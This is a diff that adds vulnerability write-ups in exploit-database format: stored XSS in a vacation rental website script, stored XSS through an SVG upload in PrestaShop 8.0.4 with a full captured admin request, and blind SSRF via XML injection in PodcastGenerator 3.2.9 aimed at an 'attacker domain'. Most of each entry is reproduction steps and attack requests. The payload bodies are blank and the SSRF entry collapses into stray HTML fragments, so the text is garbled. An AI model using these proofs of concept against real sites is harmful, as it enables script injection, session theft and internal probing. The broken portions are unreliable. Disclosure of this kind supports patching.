+# Software Link: https://gzscripts.com/vacation-rental-website.html
+# Version: 1.8
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+## Stored XSS
+
+------------------------------------------------------------
+POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1
+
+property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
+------------------------------------------------------------
+
+POST parameter 'username' is vulnerable to XSS
+POST parameter 'title' is vulnerable to XSS
+POST parameter 'comment' is vulnerable to XSS
+
+## Steps to Reproduce:
+
+1. Surf (as Guest) - Go to any Listed Property
+2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
+3. Inject your [XSS Payload] in "Username"
+4. Inject your [XSS Payload] in "Title"
+5. Inject your [XSS Payload] in "Comment"
+6. Submit
+7. XSS Fired on Local Browser
+8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]
+Note: I think Administration Panel missing a section to Manage [Reviews] on the website
+this feature must be added in next Updates [View/Edit/Delete]
\ No newline at end of file
diff --git a/exploits/php/webapps/51563.txt b/exploits/php/webapps/51563.txt
new file mode 100644
index 000000000..af1c7850d
--- /dev/null
+++ b/exploits/php/webapps/51563.txt
@@ -0,0 +1,79 @@
+Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
+Application: prestashop
+Version: 8.0.4
+Bugs: Stored XSS
+Technology: PHP
+Vendor URL: https://prestashop.com/
+Software Link: https://prestashop.com/prestashop-edition-basic/
+Date of found: 30.06.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. Go to Catalog => Products
+2. Select arbitary product
+2. upload malicious svg file
+
+svg file content ===>
+
+
+
+
+
+
+
+poc request:
+
+POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
+Host: localhost
+Content-Length: 756
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
+Accept: application/json
+Cache-Control: no-cache
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
+Connection: close
+
+------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
+Content-Disposition: form-data; name="path"
+
+
+------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
+Content-Disposition: form-data; name="path_thumb"
+
+
+------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
+Content-Disposition: form-data; name="file"; filename="malas.svg"
+Content-Type: image/svg+xml
+
+
+
+
+
+
+------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--
\ No newline at end of file
diff --git a/exploits/php/webapps/51565.txt b/exploits/php/webapps/51565.txt
new file mode 100644
index 000000000..dc3c34a5e
--- /dev/null
+++ b/exploits/php/webapps/51565.txt
@@ -0,0 +1,118 @@
+#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
+#Application: PodcastGenerator
+#Version: v3.2.9
+#Bugs: Blind SSRF via XML Injection
+#Technology: PHP
+#Vendor URL: https://podcastgenerator.net/
+#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
+#Date of found: 01-07-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
+2. Fill all section and Short Description section set as 'test]]>( example :Attacker domain)http://localhost:3132http://localhost:3132http://localhost:3132
+
+
+ Login
+
+
+
+
+
+